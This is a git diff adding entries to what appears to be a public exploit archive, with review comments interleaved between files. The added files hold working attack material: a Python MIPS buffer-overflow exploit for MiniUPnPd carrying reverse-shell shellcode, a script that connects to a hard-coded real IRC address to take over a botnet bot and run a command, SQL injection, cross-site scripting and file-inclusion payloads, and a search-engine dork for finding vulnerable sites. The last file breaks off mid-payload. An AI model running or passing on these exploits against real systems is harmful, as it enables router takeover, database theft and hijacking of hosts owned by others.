diff --git a/files.csv b/files.csv
index d09a71858..848326040 100755
--- a/files.csv
+++ b/files.csv
@@ -13090,6 +13090,7 @@ id,file,description,date,author,platform,type,port
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
+36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,java,webapps,0
15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
@@ -15958,7 +15959,7 @@ id,file,description,date,author,platform,type,port
18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0
18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0
18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0
-18417,platforms/php/webapps/18417.txt,"wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0
+18417,platforms/php/webapps/18417.txt,"Wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0
18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - CSRF Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (MSF Module)",2012-01-26,"Craig Freyman",windows,remote,0
@@ -33206,7 +33207,7 @@ id,file,description,date,author,platform,type,port
36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
-36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
+36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
@@ -33222,5 +33223,20 @@ id,file,description,date,author,platform,type,port
36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution Vulnerability",2015-04-23,"TUNISIAN CYBER",php,webapps,0
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
+36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi",2015-04-23,"Felipe Molina",php,webapps,0
+36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi #2",2015-04-23,"Felipe Molina",php,webapps,0
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
+36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (W7 - DEP Bypass)",2015-04-24,naxxo,windows,local,0
+36829,platforms/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow and Directory Traversal Vulnerabilities",2012-02-17,"Luigi Auriemma",windows,remote,0
+36830,platforms/php/webapps/36830.txt,"Impulsio CMS 'id' Parameter SQL Injection Vulnerability",2012-02-16,sonyy,php,webapps,0
+36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 openvpn_users.cgi PATH_INFO XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 dnat.cgi createrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 dansguardian.cgi addrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36834,platforms/php/webapps/36834.txt,"Joomla! X-Shop Component 'idd' Parameter SQL Injection Vulnerability",2012-02-18,KedAns-Dz,php,webapps,0
+36835,platforms/php/webapps/36835.txt,"Joomla Xcomp 'com_xcomp' Component Local File Include Vulnerability",2012-02-18,KedAns-Dz,php,webapps,0
+36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution PoC",2015-04-27,"Jay Turla",multiple,remote,0
+36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
+36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
+36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
+36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
diff --git a/platforms/hardware/remote/36831.txt b/platforms/hardware/remote/36831.txt
new file mode 100755
index 000000000..393782b6f
--- /dev/null
+++ b/platforms/hardware/remote/36831.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+
+https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS]
\ No newline at end of file
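Review bot: The impact sentence says an attacker can "execute arbitrary script on the affected server", but a cross-site scripting flaw runs script in the browser of someone using the firewall's web interface, not on the appliance itself. I would reword it to `Exploiting these issues could allow an attacker to execute arbitrary script in the browser of a user of the affected web interface and steal cookie-based authentication credentials.` The same sentence is repeated in 36832.txt and 36833.txt. None of the three files names the affected release (only the index title says 2.4) or a fixed one, so a `Version:` line in each file would let an administrator tell whether their device is covered.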
diff --git a/platforms/hardware/remote/36832.txt b/platforms/hardware/remote/36832.txt
new file mode 100755
index 000000000..f3ae299f3
--- /dev/null
+++ b/platforms/hardware/remote/36832.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+
+https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS]
\ No newline at end of file
diff --git a/platforms/hardware/remote/36833.txt b/platforms/hardware/remote/36833.txt
new file mode 100755
index 000000000..37248277b
--- /dev/null
+++ b/platforms/hardware/remote/36833.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+
+https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS]
\ No newline at end of file
diff --git a/platforms/java/webapps/36828.txt b/platforms/java/webapps/36828.txt
new file mode 100755
index 000000000..60a1540a3
--- /dev/null
+++ b/platforms/java/webapps/36828.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52060/info
+
+JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/multiple/remote/36836.py b/platforms/multiple/remote/36836.py
new file mode 100755
index 000000000..9fd19981a
--- /dev/null
+++ b/platforms/multiple/remote/36836.py
@@ -0,0 +1,50 @@
+#
+# legend_rce.py
+# Legend Perl IRC Bot Remote Code Execution PoC
+# author: Jay Turla ( @shipcod3 )
+# description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014.
+# reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html
+# greetz to ROOTCON (rootcon.org) goons
+#
+
+import socket
+import sys
+
+def usage():
+ print("USAGE: python legend_rce.py nick")
+ print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")
+
+def main(argv):
+
+ if len(argv) < 2:
+ return usage()
+
+ #irc server connection settings
+ botnick = sys.argv[1] #admin payload for taking over the Legend Bot
+ server = "80.246.50.71" #irc server
+ channel = "#Apache" #channel where the bot is located
+
+ irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
+ print "connecting to:"+server
+ irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
+ irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
+ irc.send("NICK "+ botnick +"\n") #sets nick
+ irc.send("JOIN "+ channel +"\n") #join the chan
+ irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot
+
+ while 1: #puts it in a loop
+ text=irc.recv(2040) #receive the text
+ print text #print text to console
+
+ if text.find('PING') != -1: #check if 'PING' is found
+ irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)
+ if text.find('!quit') != -1: #quit the Bot
+ irc.send ("QUIT\r\n")
+ sys.exit()
+ if text.find('Linux') != -1:
+ irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
+ irc.send ("QUIT\r\n")
+ sys.exit()
+
+if __name__ == "__main__":
+ main(sys.argv)
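Review bot: The hard-coded `server = "80.246.50.71"` and `channel = "#Apache"` mean that simply running this archived file opens a connection to a third-party host. The address would be better recorded in the header comment as an observed indicator, with the variable set to a labelled placeholder such as `server = "irc.example.invalid"  # placeholder`. The receive loop never checks for a closed connection, so once `irc.recv(2040)` returns an empty string the `while 1:` loop spins forever; `if not text: break` straight after the recv would end it. The file also mixes `print(...)` calls with Python 2 `print` statements and reads `sys.argv[1]` inside `main(argv)` instead of `argv[1]`, so a header line saying it is Python 2 only would help readers.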
diff --git a/platforms/multiple/remote/36839.py b/platforms/multiple/remote/36839.py
new file mode 100755
index 000000000..86b368da9
--- /dev/null
+++ b/platforms/multiple/remote/36839.py
@@ -0,0 +1,142 @@
+#!/usr/bin/env python
+
+# Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
+# Date: 26.04.2015
+# Exploit Author: Onur ALANBEL (BGA)
+# Vendor Homepage: http://miniupnp.free.fr/
+# Version: 1.0
+# Architecture: MIPS
+# Tested on: AirTies RT-204v3
+# CVE : 2013-0230
+# Exploit gives a reverse shell to lhost:lport
+# Details: https://www.exploit-db.com/docs/36806.pdf
+
+import urllib2
+from string import join
+from argparse import ArgumentParser
+from struct import pack
+from socket import inet_aton
+
+BYTES = 4
+
+
+def hex2str(value, size=BYTES):
+ data = ""
+
+ for i in range(0, size):
+ data += chr((value >> (8*i)) & 0xFF)
+
+ data = data[::-1]
+
+ return data
+
+
+arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \
+ CVE-2013-0230 Reverse Shell exploit for AirTies \
+ RT Series, start netcat on lhost:lport")
+arg_parser.add_argument("--target", required=True, help="Target IP address")
+arg_parser.add_argument("--lhost", required=True, help="The IP address\
+ which nc is listening")
+arg_parser.add_argument("--lport", required=True, type=int, help="The\
+ port which nc is listening")
+
+args = arg_parser.parse_args()
+
+libc_base = 0x2aabd000
+ra_1 = hex2str(libc_base + 0x36860) # ra = 1. gadget
+s1 = hex2str(libc_base + 0x1636C) # s1 = 2. gadget
+sleep = hex2str(libc_base + 0x35620) # sleep function
+ra_2 = hex2str(libc_base + 0x28D3C) # ra = 3. gadget
+s6 = hex2str(libc_base + 0x1B19C) # ra = 4.gadget
+s2 = s6
+lport = pack('>H', args.lport)
+lhost = inet_aton(args.lhost)
+
+shellcode = join([
+ "\x24\x11\xff\xff"
+ "\x24\x04\x27\x0f"
+ "\x24\x02\x10\x46"
+ "\x01\x01\x01\x0c"
+ "\x1e\x20\xff\xfc"
+ "\x24\x11\x10\x2d"
+ "\x24\x02\x0f\xa2"
+ "\x01\x01\x01\x0c"
+ "\x1c\x40\xff\xf8"
+ "\x24\x0f\xff\xfa"
+ "\x01\xe0\x78\x27"
+ "\x21\xe4\xff\xfd"
+ "\x21\xe5\xff\xfd"
+ "\x28\x06\xff\xff"
+ "\x24\x02\x10\x57"
+ "\x01\x01\x01\x0c"
+ "\xaf\xa2\xff\xff"
+ "\x8f\xa4\xff\xff"
+ "\x34\x0f\xff\xfd"
+ "\x01\xe0\x78\x27"
+ "\xaf\xaf\xff\xe0"
+ "\x3c\x0e" + lport +
+ "\x35\xce" + lport +
+ "\xaf\xae\xff\xe4"
+ "\x3c\x0e" + lhost[:2] +
+ "\x35\xce" + lhost[2:4] +
+ "\xaf\xae\xff\xe6"
+ "\x27\xa5\xff\xe2"
+ "\x24\x0c\xff\xef"
+ "\x01\x80\x30\x27"
+ "\x24\x02\x10\x4a"
+ "\x01\x01\x01\x0c"
+ "\x24\x0f\xff\xfd"
+ "\x01\xe0\x78\x27"
+ "\x8f\xa4\xff\xff"
+ "\x01\xe0\x28\x21"
+ "\x24\x02\x0f\xdf"
+ "\x01\x01\x01\x0c"
+ "\x24\x10\xff\xff"
+ "\x21\xef\xff\xff"
+ "\x15\xf0\xff\xfa"
+ "\x28\x06\xff\xff"
+ "\x3c\x0f\x2f\x2f"
+ "\x35\xef\x62\x69"
+ "\xaf\xaf\xff\xec"
+ "\x3c\x0e\x6e\x2f"
+ "\x35\xce\x73\x68"
+ "\xaf\xae\xff\xf0"
+ "\xaf\xa0\xff\xf4"
+ "\x27\xa4\xff\xec"
+ "\xaf\xa4\xff\xf8"
+ "\xaf\xa0\xff\xfc"
+ "\x27\xa5\xff\xf8"
+ "\x24\x02\x0f\xab"
+ "\x01\x01\x01\x0c"
+ ], '')
+
+payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\
+ + ra_2 + 'C'*32 + shellcode
+
+
+soap_headers = {
+ 'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
+}
+
+soap_data = """
+
+
+
+
+
+
+
+ """
+
+try:
+ print "Exploiting..."
+ req = urllib2.Request("http://" + args.target + ":5555", soap_data,
+ soap_headers)
+ res = urllib2.urlopen(req).read()
+except:
+ print "Ok"
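Review bot: The bare `except:` at the end prints "Ok" for every exception, including a refused connection, an unparsable `--target` or a keyboard interrupt, so the output says nothing about what happened; catching `urllib2.URLError as e` and printing `e` would be clearer. The header cites CVE 2013-0230 but gives no fixed MiniUPnPd release or mitigation, and `libc_base = 0x2aabd000` has no comment saying it presumably holds only for the tested AirTies RT-204v3 firmware. For defenders, a header comment noting that the overflow is delivered in the `SOAPAction` request header (`payload` begins with 2052 filler bytes) would point at the header-length check to look for on the UPnP HTTP port. The `soap_data` literal is only blank lines, which looks like markup lost when the file was captured and should be restored or removed.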
diff --git a/platforms/php/webapps/36823.txt b/platforms/php/webapps/36823.txt
new file mode 100755
index 000000000..fd7be177f
--- /dev/null
+++ b/platforms/php/webapps/36823.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
+Product Catalogue wordpress plugin
+# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
+intext:"Category",
+inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
+# Date: 22/04/2015
+# Exploit Author: Felipe Molina de la Torre (@felmoltor)
+# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
+# Software Link:
+https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
+# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
+# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
+2.4.0 (Ubuntu)
+# CVE : Requested to mitre but not assigned yet
+# Category: webapps
+
+1. Summary:
+
+ Ultimate Product Catalogue is a responsive and easily customizable
+plugin for all your product catalogue needs. It has +59.000 downloads,
++3.000 active installations.
+
+ Unauthenticated SQL injection in ajax call when the plugin is counting
+the times a product is being seen by the web visitors. The vulnerable POST
+parameter is "Item_ID".
+
+2. Vulnerability timeline:
+- 22/04/2015: Identified in version 3.1.2
+- 22/04/2015: Comunicated to developer company etoilewebdesign.com
+- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
+3. Vulnerable code:
+
+ In file Functions/Process_Ajax.php line 67:
+ [...]
+$Item_ID = $_POST['Item_ID'];
+ $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
+WHERE Item_ID=" . $Item_ID);
+[...]
+
+3. Proof of concept:
+
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host:
+ [...]
+ Cookie: wordpress_f305[...]
+
+ Item_ID=2 AND SLEEP(5)&action=record_view
+
+4. Solution:
+
+ Update to version 3.1.3
\ No newline at end of file
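Review bot: The header line `# Version: < 3.1.2` contradicts the timeline, which says the issue was identified in version 3.1.2 and fixed in 3.1.3; it should read `# Version: <= 3.1.2`, and 36824.txt carries the same header. The section numbering also uses "3." twice, for both "Vulnerable code" and "Proof of concept". Since the vulnerable lines are quoted, the Solution section could show the shape of the fix for sites that cannot upgrade at once: cast the value with `intval($_POST['Item_ID'])` or build the query with `$wpdb->prepare("... WHERE Item_ID=%d", $Item_ID)`. Whether 3.1.3 does exactly this is not shown in the file.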
diff --git a/platforms/php/webapps/36824.txt b/platforms/php/webapps/36824.txt
new file mode 100755
index 000000000..6aaba8cce
--- /dev/null
+++ b/platforms/php/webapps/36824.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
+wordpress plugin
+# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
+intext:"Category",
+inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
+# Date: 22/04/2015
+# Exploit Author: Felipe Molina de la Torre (@felmoltor)
+# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
+# Software Link:
+https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
+# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
+# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
+2.4.0 (Ubuntu)
+# CVE : Requested to mitre but not assigned yet
+# Category: webapps
+
+1. Summary:
+
+ Ultimate Product Catalogue is A responsive and easily customizable
+plugin for all your product catalogue needs. It has +59.000 downloads,
++3.000 active installations.
+
+ Unauthenticated SQL injection in parameter "SingleProduct" when a web
+visitor explores a product published by the web administrator
+
+2. Vulnerability timeline:
+- 22/04/2015: Identified in version 3.1.2
+- 22/04/2015: Comunicated to developer company etoilewebdesign.com
+- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
+3. Vulnerable code:
+
+ File Functions/Shortcodes.php line 779
+
+3. Proof of concept
+
+ http:///?SingleProduct=2'+and+'a'='a
+ http:///?SingleProduct=2'+and+'a'='b
+
+4. Solution:
+
+ Update to version 3.1.3
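Review bot: The "Vulnerable code" section gives only `File Functions/Shortcodes.php line 779` with no snippet, unlike 36823.txt, so a reader cannot see which query concatenates `SingleProduct` or confirm that their copy is patched; quoting the one or two affected lines would fix that. The proof-of-concept URLs read `http:///?SingleProduct=...` with an empty host, presumably a stripped placeholder, and would be clearer as `http://www.example.com/?SingleProduct=...`. The header also contains the typo `turnedd`.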
diff --git a/platforms/php/webapps/36830.txt b/platforms/php/webapps/36830.txt
new file mode 100755
index 000000000..a31018896
--- /dev/null
+++ b/platforms/php/webapps/36830.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52063/info
+
+Impulsio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?id=[SQL]
\ No newline at end of file
diff --git a/platforms/php/webapps/36834.txt b/platforms/php/webapps/36834.txt
new file mode 100755
index 000000000..7cf662dcd
--- /dev/null
+++ b/platforms/php/webapps/36834.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52077/info
+
+The X-Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd='
\ No newline at end of file
diff --git a/platforms/php/webapps/36835.txt b/platforms/php/webapps/36835.txt
new file mode 100755
index 000000000..eed6d2541
--- /dev/null
+++ b/platforms/php/webapps/36835.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52078/info
+
+The Xcomp component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00
\ No newline at end of file
diff --git a/platforms/php/webapps/36842.pl b/platforms/php/webapps/36842.pl
new file mode 100755
index 000000000..9a916527a
--- /dev/null
+++ b/platforms/php/webapps/36842.pl
@@ -0,0 +1,20 @@
+# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
+# Date: 28.01.2014
+# Exploit Author: Adam Ziaja http://adamziaja.com
+# Vendor Homepage: https://www.otrs.com
+# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
+# CVE : CVE-2014-1695
+
+#!/usr/bin/perl -w
+use strict;
+use MIME::Lite;
+my $msg = MIME::Lite->new(
+ Subject => 'OTRS XSS PoC',
+ From => 'attacker@example.com',
+ To => 'otrs@example.com',
+ Type => 'text/html',
+ Data =>
+ '![]()